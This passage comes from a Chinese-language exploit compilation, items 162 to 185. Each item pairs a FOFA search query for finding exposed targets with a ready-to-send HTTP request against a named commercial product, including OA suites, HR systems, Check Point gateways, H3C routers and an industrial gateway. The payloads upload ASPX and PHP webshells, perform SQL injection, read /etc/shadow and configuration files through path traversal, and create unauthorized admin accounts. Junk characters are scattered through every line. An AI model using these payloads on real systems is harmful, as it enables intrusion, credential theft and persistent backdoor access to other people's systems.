; ~* l a/ Z. B+ H: N- d<fileName>../../../../dizxdell.aspx</fileName>
' A% ~2 X G- Y; p<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>; f# A) Z0 p( _3 [9 @6 J
<tag>3</tag>! k2 _' S0 G- S/ A7 `
</UploadResume>
0 k2 A5 ~, O- ]# G, v$ G: d</soap:Body>
) Z* c! d; p! ?; p2 B* N- a' n; r</soap:Envelope>" u/ {) W2 i" A4 u- R* r0 O0 C/ L4 n
. M3 t* s7 n- @0 f
! ~" K F) D6 @1 D7 z: S; lhttp://x.x.x.x/dizxdell.aspx5 O Y) d+ b. }, y% }; E
! K) I* M- u4 B6 B
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
! D5 N( D- X; h' s; SFOFA: app="和丰山海-数字标牌"
) ^% h; _# b9 JPOST /QH.aspx HTTP/1.1
: h) t6 H4 b! X( v( VHost: x.x.x.x$ J+ d2 h, t8 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, @; e# l3 e8 O2 T5 S4 h7 AConnection: close M `# B$ p9 c P6 U; ?3 C
Content-Length: 5835 K; B* [" A1 [. X- _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey. s. J& o( M+ \1 C9 Q' E' S1 I
Accept-Encoding: gzip% H9 U: d' F M# m; t- q9 E1 ~( l( c4 O: @
! H" O# A Y4 x, I------WebKitFormBoundaryeegvclmyurlotuey
; q7 W0 e. b+ L" yContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
& x" i9 G9 u% o- u! _Content-Type: application/octet-stream4 l) T$ h) L; ^! o! D! c6 g
7 P0 v7 U) O" v) v3 H' Q
<% response.write("ujidwqfuuqjalgkvrpqy") %>
2 q; q% ]' E8 _. q9 ]------WebKitFormBoundaryeegvclmyurlotuey7 E/ I1 n$ i# O
Content-Disposition: form-data; name="action"
% }1 V @5 q2 u8 \
7 u1 O; O+ F3 Y/ o3 a" L2 y3 wupload
+ N$ m. B! M5 w; L$ k+ C------WebKitFormBoundaryeegvclmyurlotuey. ]& Y0 ]( j: S l7 U
Content-Disposition: form-data; name="responderId"
2 W) k8 B3 T9 J. y/ X; N
5 J" w. v$ r# QResourceNewResponder
& c2 M$ p/ ?8 z) `/ x/ u9 |9 D; c------WebKitFormBoundaryeegvclmyurlotuey# p/ D2 K& R: E7 |% c e) C
Content-Disposition: form-data; name="remotePath"$ r$ _( T8 b6 ~3 S0 T8 e
' V1 ?0 Z3 L8 k% |
/opt/resources
% K* J2 h! H; @ b5 t! |------WebKitFormBoundaryeegvclmyurlotuey--
3 e0 g+ @# F( W2 l4 T6 `4 Q# F$ ^( V$ u
0 l" X2 V& T+ ?' `6 P! q
http://x.x.x.x/opt/resources/kjuhitjgk.aspx( P) p: v4 I) T% M: t' A) f3 ?
D- n4 p, Y' X# L+ n163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 z5 Z5 \4 R' f: X. T
FOFA: icon_hash="-795291075"
, X9 v9 u; c. W$ B0 p: }POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1. n* Z. V0 q: `( ]3 W1 R
Host: x.x.x.x; s+ N" }+ v9 y: d- T' V* M ?, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.363 Z- O( Q" v& V3 g
Connection: close
: R I! x( F3 ^Content-Length: 293
7 V+ W- E' ~4 J# A! h. t2 xAccept: */*/ O3 g+ ?3 v. ]* \
Accept-Encoding: gzip, deflate7 o% o( j% d* Z% h
Accept-Language: zh-CN,zh;q=0.9. z' c7 s" j' s; t& M; G
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
, E! l# Y; _- x6 p' W9 z' C
" P! L) _0 c! p. R------iiqvnofupvhdyrcoqyuujyetjvqgocod) n2 J7 J2 U/ n5 }( w' g
Content-Disposition: form-data; name="name"% k1 A0 R, {& `
2 E, p( j; n7 I* z* u* ]1.php* J1 W7 A- S! ~
------iiqvnofupvhdyrcoqyuujyetjvqgocod4 C4 C$ b T* t6 B+ Y
Content-Disposition: form-data; name="upfile"; filename="1.php"- j; W6 g! | {; \
Content-Type: image/jpeg7 m1 d" W! P% V0 ?! A0 _
! }* `$ a" F/ D+ ?rvjhvbhwwuooyiioxega
' J, D) f, T# S% j5 W' K/ `; P, u------iiqvnofupvhdyrcoqyuujyetjvqgocod--
7 M: @- `+ t5 s% |$ k4 E" Q6 t
& C7 h' {, W$ C( f9 s
/ Z1 S5 a2 N: [, H" f9 ]164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ t& \/ n5 s7 Z$ m1 X0 |& f9 iFOFA: title="智慧综合管理平台登入") Q' @# S" t5 k4 L4 b c9 g. T" Q) Y
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1. Z0 X& `0 [" [: _' c2 c' c2 c
Host: x.x.x.x: z1 V2 E6 i# J1 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0. g) ^ O! D- ^
Content-Length: 288
: W. W- a2 J5 ]. N5 t o& NAccept: application/json, text/javascript, */*; q=0.01
5 o% c, O7 M) f0 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,$ Q7 X& v# }( V8 m; U
Connection: close& r3 `* Y9 B6 i2 r- D/ c2 r
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl0 f; u# j8 q1 p. }
X-Requested-With: XMLHttpRequest( h: L' G: g3 R" |9 ?2 U4 I8 f- R
Accept-Encoding: gzip
0 }9 _( c) k ^3 j; d
0 d/ k; U; E# \" b4 [------dqdaieopnozbkapjacdbdthlvtlyl
' J8 F: l( O- S3 w, VContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
; w; U/ `- L7 M. @$ Q5 t, r0 uContent-Type: image/jpeg
2 I( [, M3 Q p& X' f+ H4 }+ U+ Z; \3 q) ]# s' S
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>5 I4 o4 @( y. ]& p3 k1 s
------dqdaieopnozbkapjacdbdthlvtlyl--- x- ~+ W/ b% b/ Q0 O9 H) E
9 _$ D2 H3 P9 q [- i' V. ?- b- J5 ^- `% D9 B/ u
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx, J0 h3 [) _) G$ s8 w& Q
! l# f! K" {( C T8 x. ^$ R165. OrangeHRM 3.3.3 SQL 注入
9 Q+ Y h1 l# b+ \" CCVE-2024-36428
. E# [( e$ b5 P* B7 u& JFOFA: app="OrangeHRM-产品"7 j' M6 |' D! N7 S
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
) [6 Z! X. e9 e0 i& T4 u" _% E0 G" ?6 t+ K" E6 ~% R L
* M; S& n: e0 K
166. 中成科信票务管理平台SeatMapHandler SQL注入
2 Q2 d$ U+ e9 T! }8 k, dFOFA:body="技术支持:北京中成科信科技发展有限公司"! Y6 U; y, z$ \3 Y. r
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1/ C9 O, v- ~+ \! r+ p6 Z+ E$ ?
Host:0 Q" \. {* X S4 A3 e
Pragma: no-cache! W# y# K7 ^1 ]
Cache-Control: no-cache$ m, L/ d! {- E
Upgrade-Insecure-Requests: 1
4 Q# `8 `7 ~' L |5 R) c/ T4 ^1 L$ B6 f" pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36; ]& ]. e) U* M/ y/ b j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. ?5 M5 L( `; K& t
Accept-Encoding: gzip, deflate
! B& x% ~& |% Y( ^* z4 {& XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 F; E6 Z4 A7 R! K; J$ I0 G; CCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
, E3 Q$ U& F+ {. t( U; c1 JConnection: close
+ R0 ^) `5 ]. AContent-Type: application/x-www-form-urlencoded
* `. G; o4 q9 SContent-Length: 89
% C/ P) X3 y2 F0 r+ u+ s
, s/ i6 D, Q5 Y! A! [Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE- U7 {$ z$ T( R: M0 @$ M x
6 w3 }, d. l9 W) E3 |9 Y
- x" H, M- K2 W5 T @167. 精益价值管理系统 DownLoad.aspx任意文件读取7 j- G2 T% F; i9 w/ O1 _; G7 {* H
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"! G8 o, `6 d: |* ]
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1% ?$ v/ M! s, c" u3 z
Host:. t1 b, N: ^4 i; s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 w) b& }5 X' L% f( [8 E( a- nContent-Type: application/x-www-form-urlencoded$ Q/ {% \7 Q2 R
Accept-Encoding: gzip, deflate1 {: J3 O4 B# \. u
Accept: */*
[0 K% ~6 _0 \. LConnection: keep-alive
; Y2 ` t$ E% T* {* D& N
* i, g3 D% S% B; ]1 B4 j5 r% X! r% L1 T! l/ X, F
168. 宏景EHR OutputCode 任意文件读取2 H1 n+ f: N, u, O# V4 e) j
FOFA:app="HJSOFT-HCM"1 d6 V4 J* e4 J: y! C
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1$ V0 b$ Y- w1 G. C @" s
Host: your-ip$ s1 f& u. M2 K) I6 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36) {: y9 D4 J5 M2 y# X
Content-Type: application/x-www-form-urlencoded
1 d! y A5 C$ A* n6 M+ i5 _' tConnection: close
! S% S6 Z! O6 [( F; v+ f
0 ^. u5 p, Z9 e( v' B2 ~; Z) x$ e; L5 D5 @; p% g
3 d. z3 f! Z5 M. m2 x! R# I
169. 宏景EHR downlawbase SQL注入3 t# }8 \% }* W4 _: M, N5 L
FOFA:app="HJSOFT-HCM"- o+ X6 [ r+ j% y7 P/ y! i
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.10 h. [ h6 A& s
Host: your-ip
- L5 r0 c/ E. A* B1 d: N8 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 c" ~9 K$ a2 [4 {Accept: */*
% E. C1 n: d ~" @, \5 zAccept-Encoding: gzip, deflate
$ E+ ]% S& S" ?" A/ E# t+ n# eConnection: close. ]( Z3 \! D- t0 I' N- X' P/ R4 W
' x: N1 n! j# N6 S6 c' O# Q
7 x3 J; f" [. b, y) I; f7 b, b2 ^. F% A0 ~1 q# j, r7 w
170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ b, Y o* x% p6 n0 {4 \% o9 }3 M
FOFA:body="/general/sys/hjaxmanage.js"* {% Q. |$ ?9 [% K
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1& w* y' k# i; r1 {: D" d$ f
Host: balalanengliang
' ^: b8 f* U. IUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 Z& @ c) \' b8 D4 z
Content-Type: application/x-www-form-urlencoded% X& I, ~- M: ?- R, c
3 {5 h* P! ^' V* c+ z
filename=../webapps/ROOT/WEB-INF/web.xml& P9 l# C" t b+ ^# M' M- }
% _% R* b3 }- ^ s7 O5 Z0 b- F
5 M6 C- K; b: `, k171. 通天星CMSV6车载定位监控平台 SQL注入
. D$ j7 i; o% p. W8 J4 sFOFA:body="/808gps/"- J/ C1 F @" A8 c! J' q8 |0 ?* \
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
( ~: w* ?+ M' X3 _4 ]$ p3 XHost: your-ip3 F8 j% S; Q$ ^5 N" [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.07 j1 |, M1 R) i) B* J! s
Accept: */*6 H2 W4 p& n. a+ Z R) M/ R9 E3 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 O. Q4 j+ H& ?Accept-Encoding: gzip, deflate4 W4 t! t" N1 _
Connection: close7 q2 m* ^+ e' j- {( a
2 X" |' G* O! D
; w+ l" R x' ~" }" g) X1 H$ A0 y" ^ p5 c
172. DT-高清车牌识别摄像机任意文件读取$ z- j4 k: ?# e
FOFA:app="DT-高清车牌识别摄像机"5 g3 C- b7 Y+ m4 k# B0 D
GET /../../../../etc/passwd HTTP/1.1, ]0 M9 v% X* m: n7 S- r
Host: your-ip
) I0 Q. W5 E8 k' w5 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 O1 Y5 z& l$ N: Y3 H
Accept-Encoding: gzip, deflate
% ]8 H5 n! l: m% }. HAccept: */*
2 f/ ~3 F% f$ X: p; Z( a+ UConnection: keep-alive/ H0 o7 q: Q5 w- n
_* k& O) V* S6 P: Y9 n" Z
% k9 n0 D- p0 ]2 m" }
/ _' J) ^+ H8 l- g9 e
173. Check Point 安全网关任意文件读取$ U; C9 \. K6 L' T; A/ P! Z
CVE-2024-24919
+ p0 v0 N0 @! K; r/ e, E* ?FOFA:app="Check_Point-SSL-Network-Extender"2 C' [% f. w8 t& a
POST /clients/MyCRL HTTP/1.1
+ Y+ m; D% `* f: L+ _8 gHost: your-ip
1 {- f; F; s2 B l0 B5 P h3 d$ |Content-Type: application/x-www-form-urlencoded
( j2 ?' }6 M! a
# M9 f% h5 j: s8 p& naCSHELL/../../../../../../../etc/shadow/ E+ z6 l/ D+ b3 G: C3 P
! c& O0 i2 a* q9 C# ]! F V2 S% s: l3 t
# l o& x0 w) u! Q" V/ p& k174. 金和OA C6 FileDownLoad.aspx 任意文件读取4 S& S2 I3 k' F+ C5 Z
FOFA:app="金和网络-金和OA"
, ?' z% A, u0 `" cGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1& Z4 {3 x6 `$ X
Host: your-ip2 j$ e* X4 m4 ^" P$ D+ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 ]6 B. Q' q- Y+ Y6 q% o+ P4 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ r; j, O, w h1 M7 KAccept-Encoding: gzip, deflate, br) K1 F X* y: F$ K+ r
Accept-Language: zh-CN,zh;q=0.9
) d2 |# B; T! N* r$ sConnection: close
1 T$ M0 R8 s2 g
+ M- p6 G, h- O/ l' i) a) \: ^" F. S8 w# {! Y- S+ g8 B
# \/ \( s- _1 H( J$ o) ^175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入5 ~* o8 W# v0 B1 g& j
FOFA:app="金和网络-金和OA"
. n( q5 t6 K* M* W: \" N: |8 R2 ZGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1: r. S0 j( Y1 ^' h1 [) L% c9 [3 C
Host:, N, i8 w4 a3 S$ h3 g
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; |- O% \2 q8 s6 i3 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! b" w; o8 y. ^# E/ ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# o2 R0 i$ T3 E9 i$ a
Accept-Encoding: gzip, deflate
4 K5 g$ Q/ x* Z/ J. f3 rConnection: close+ u' S6 L0 C$ S! i
Upgrade-Insecure-Requests: 1
! ]: L7 s# m" ?) a! s! f* o, e* O& I. l; X; v3 W. V
6 ~ u R; O& G, y& u
176. 电信网关配置管理系统 rewrite.php 文件上传
9 `, z& n, q' N4 k$ o$ ], mFOFA:body="img/login_bg3.png" && body="系统登录"9 T1 G0 x' m+ T/ \7 S! f1 R$ ?
POST /manager/teletext/material/rewrite.php HTTP/1.1
1 d; b! D% g7 p9 ~; [ EHost: your-ip8 K* C$ ^1 E' q4 t/ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( w% A0 t4 {! ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT2 O) ^, G- T& o( M: @3 `! Z
Connection: close
; b" d, C% t, s9 g2 P% N+ s( X" q' d2 i
------WebKitFormBoundaryOKldnDPT
7 D$ c$ U) ^- D7 [( h2 i, B+ iContent-Disposition: form-data; name="tmp_name"; filename="test.php"+ }& j. H7 M9 }6 {) Q( ~+ w4 s
Content-Type: image/png
& k9 c' I" ^% \: p4 h ! F6 e6 F3 Z4 Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>! A, l5 v! F; h9 d: ~- {4 w
------WebKitFormBoundaryOKldnDPT4 y L/ ^: Q# N3 D$ d
Content-Disposition: form-data; name="uploadtime"
5 M, _6 ~: |5 ?! @9 B) }. F5 ?
% b0 Z B/ I- E
4 I& K& I. J! A- M& D1 C------WebKitFormBoundaryOKldnDPT--
" h; b2 I0 S+ q1 l% k
$ w' ?5 B; f4 m; R8 O, X4 W `( v2 N6 H3 T j
! U3 v" o {" |) s8 }- L+ _
177. H3C路由器敏感信息泄露( L1 x# N/ B2 W$ b- q# R
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* _' Z$ c& Z; X/ A* Z9 n7 a
/userLogin.asp/../actionpolicy_status/../M60.cfg
/ {5 E. X$ }) s) \1 M. t# s/userLogin.asp/../actionpolicy_status/../GR8300.cfg
4 R* K7 L. G4 t; K& G, x/userLogin.asp/../actionpolicy_status/../GR5200.cfg
2 \/ F4 _* S% c5 F/userLogin.asp/../actionpolicy_status/../GR3200.cfg* l! l' K% W0 Y& Y+ b8 g( k
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
2 D# p" C8 g& q8 h) i) J- @9 B/ n5 C/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg" S* c6 U3 q3 @& r
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
4 I$ x# t- ~0 L1 Z" k! r/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg0 L5 w: b( |$ a. q3 z9 h% n" f) y
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg5 L3 V1 k" d& ~2 m% s7 f& k( J
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
1 H' Q$ P- Y7 H1 J& F/userLogin.asp/../actionpolicy_status/../ER5100.cfg7 ~; V; g" N' E: e) u+ W
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
( S- Q. N& T1 _/userLogin.asp/../actionpolicy_status/../ER3260.cfg+ U6 [, A8 |' q. S( O7 {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
5 B) l* E5 n) `8 n2 W+ z; y) S/userLogin.asp/../actionpolicy_status/../ER3200.cfg
! {9 F+ M3 u, f% a, Q! `9 N& u6 F2 G/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
: M$ |8 r2 j7 c, U/userLogin.asp/../actionpolicy_status/../ER3108G.cfg( J( ^8 L& p' f) ?
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
. y3 C' [5 U0 U6 [$ `/userLogin.asp/../actionpolicy_status/../ER3100.cfg
+ ?! l, O* w' |) N# `* U; I- q/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
9 E0 H" d& V% j6 \8 u
( c8 f0 ^& {, R6 z$ g$ s% g1 [, F1 e' Z
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
0 _! e2 u& y' `9 j! O5 }' L. YFOFA:header="/selfservice"
' a8 W8 G7 X8 d$ e/ a. `5 S1 CPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1) K7 b- K( t) O
Host:
1 v& D6 Y$ D2 Y& p$ b: jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) S) S, g8 Z9 C- d8 D
Content-Length: 252
, ~, f1 Y; h+ o/ b. a o7 eAccept-Encoding: gzip, deflate8 ^+ u }6 I, Y
Connection: close6 G9 r9 A; B0 k2 {( Z$ ]
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l$ d/ V$ `. n" x! ?- n. Y* s
-----------------aqutkea7vvanpqy3rh2l
' F! S) Q; D: _) l- D% S( |Content-Disposition: form-data; name="12234.txt"; filename="12234": X# q( B' x; ~7 W. t" g1 H
Content-Type: application/octet-stream
1 D P1 |/ `8 g; s- zContent-Length: 255
7 W! x8 j4 r8 A( {' R% b+ x
$ e% w$ u$ U* c% d7 c122342 r; v5 m) K2 s) A+ f$ s8 F/ p! J
-----------------aqutkea7vvanpqy3rh2l--
* l: L0 @5 h1 U2 Y" w/ @# y$ u) B' `1 ~# I# R: d9 t
9 {. X+ u* V9 {/ v* m' k; d
GET /imc/primepush/%2e%2e/flex/12234.txt7 c. k9 L$ T7 a6 }
% `! R* H* J7 b. w2 p- H
8 U8 [9 }4 [: R6 f179. 建文工程管理系统存在任意文件读取- L5 n8 y! ?+ i/ g
POST /Common/DownLoad2.aspx HTTP/1.1
2 o/ z; \1 g+ T* b" f" D% rHost: {{Hostname}}
8 @0 ]& r6 B/ ]' b1 ?! _Content-Type: application/x-www-form-urlencoded
& ^& r$ Q( N3 v7 \9 hUser-Agent: Mozilla/5.0/ `" n z/ I9 [9 ]9 A. C# a
3 \ |4 q# b4 u5 t
path=../log4net.config&Name= E0 S0 A- k1 ^
, t l, N, r" e$ `: T8 D; i% y, H* l n2 S Y
180. 帮管客 CRM jiliyu SQL注入
7 N: U1 u' E% @5 |FOFA:app="帮管客-CRM"
) {$ [4 _. s5 q7 oGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
# u2 d, M3 C( @2 I9 ?0 FHost: your-ip( z% ?9 t/ `6 S" ^" t3 P! s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* b4 R0 [" S" P2 m* q' ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 {( a( m1 E9 [7 c$ K' G
Accept-Encoding: gzip, deflate
5 f q' l& G( V( XAccept-Language: zh-CN,zh;q=0.9/ L. U* n8 H {& n
Connection: close: p* A& u& u2 R4 G4 K5 W
& T% N/ N4 |+ y A" a
; F) V: M2 J0 V; E2 D
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% N; d, m9 e" Q1 M: [ mFOFA:"PDCA/js/_publicCom.js"7 H, R& \* e, E+ y6 ~1 r
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.19 T. q$ m9 C/ S! h6 x7 \* ?# q a
Host: your-ip+ e0 ~0 q9 y7 O( L a+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
9 y2 H# F" l5 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 F% O9 I0 r5 j$ C4 s) D, h
Accept-Encoding: gzip, deflate, br2 B3 q( Q/ X/ X6 |* \* S, _6 T8 O' H; `
Accept-Language: zh-CN,zh;q=0.9( {5 ?3 B4 i# ~% {- m0 Q* v
Connection: close
" {7 O4 h* p: t, XContent-Type: application/x-www-form-urlencoded4 s, `; z7 n% R
- b) F$ a/ k. r; O
$ \8 n* M( @. x: H% M5 Aaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20) d; Y- E t& Z \8 @/ f
! b' b0 P. V( s
- u, D4 \9 r _7 R- N
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) ?) B: `6 d+ _% s% b. tFOFA:"PDCA/js/_publicCom.js"7 Q, W; F7 o8 ]5 V3 }* |+ f
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
2 j M' \8 h$ b$ W* D1 ^7 IHost: your-ip" Q# K9 G3 x# d4 j0 r4 Q0 O$ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
. g% Z, A8 ~1 i9 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! N, V6 c/ R: dAccept-Encoding: gzip, deflate, br/ B9 A B4 _5 b, F' h. ?) G
Accept-Language: zh-CN,zh;q=0.9
8 c: e# v' t# u) l EConnection: close% G1 F6 Q7 m) E- [$ C1 f" l
Content-Type: application/x-www-form-urlencoded
' s5 U2 p! {* H* T0 z
8 N8 c9 [# u: t, _: d1 x' S7 V! ?9 O( t* o$ O. \2 r% ~
username=test1234&pwd=test1234&savedays=1* y6 A5 z# a4 t3 C$ ?
+ ~: m3 v3 W$ [2 z* ^1 }; b
' p7 s$ v# Z$ m
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入( P; q0 s( Y: Y9 P1 f8 g
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"0 o0 H1 ^* n$ A
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.13 j! Z: z4 y) G' [" t7 | a
Host: your-ip8 J; J" U7 w/ N5 x6 ^ c" X
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 ~8 H# Y) f9 aAccept-Charset: utf-8
0 y0 W$ c8 X2 n/ NAccept-Encoding: gzip, deflate
/ s! X a: E) Y: q7 MConnection: close
0 I- M0 O* H2 J( n) b& J8 d) T6 y; z c0 R4 g
% k- |' f& C M7 K1 U' C! g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
7 E6 q0 Z7 {; X5 k* EFOFA:server="SunFull-Webs"
" B) s' _4 W& ?- C* sPOST /soap/AddUser HTTP/1.1
. i$ U' W7 S; F1 n* t1 m/ N8 P: WHost: your-ip
$ v; c- X" x# F: P& L( w8 rAccept-Encoding: gzip, deflate$ M" u w9 W% I% A2 \. @. U6 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& |8 V& T+ j- J
Accept: application/xml, text/xml, */*; q=0.01( o$ A/ f+ M4 ^0 C- q
Content-Type: text/xml; charset=utf-8
0 s8 ?4 d1 ^7 w0 m& _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 l# ~( b9 Q0 ?4 d4 w1 mX-Requested-With: XMLHttpRequest6 }! o, o/ P, h
! U! A& m/ |4 U4 `1 Y o
' U) O* a3 _- p1 L+ A0 pinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
* } A! k9 l' N& [ ?3 H6 i# I
; ~) J9 b0 l0 H5 R$ j0 o
1 r% j! E/ q5 A# K! x2 V/ A" G185. 瑞友天翼应用虚拟化系统SQL注入
# k6 t4 z6 ~. A8 [3 zversion < 7.0.5.1
9 j$ h1 T" k/ C r; U$ bFOFA:app="REALOR-天翼应用虚拟化系统"
